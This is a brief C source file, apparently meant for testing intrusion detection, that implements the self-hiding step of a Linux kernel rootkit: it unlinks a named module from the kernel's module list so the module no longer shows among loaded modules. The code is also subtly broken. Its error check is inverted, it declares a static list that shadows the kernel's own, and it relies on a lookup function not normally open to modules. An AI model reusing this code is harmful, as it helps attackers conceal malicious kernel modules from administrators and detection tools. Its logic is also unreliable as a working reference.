Testing IDS with "invisible lkm"

hide.c

/* tested on Linux 3.14
 *
*/
#include <linux/kernel.h>
#include <linux/rculist.h>
#include <linux/moduleloader.h>

static LIST_HEAD(modules);

#define MODULE_NAME "module"

int	delete_from_modules_list(void)
{
  struct module *me;

  me = find_module(MODULE_NAME);

  if (!me)
    return -1;

  list_del(&me->list);
  return 0;
}

int     hide(void)
{
  if ( !delete_from_modules_list())
      printk(KERN_ALERT "[lkm] Error while removing myself from modules list.\n");
  return 0;
}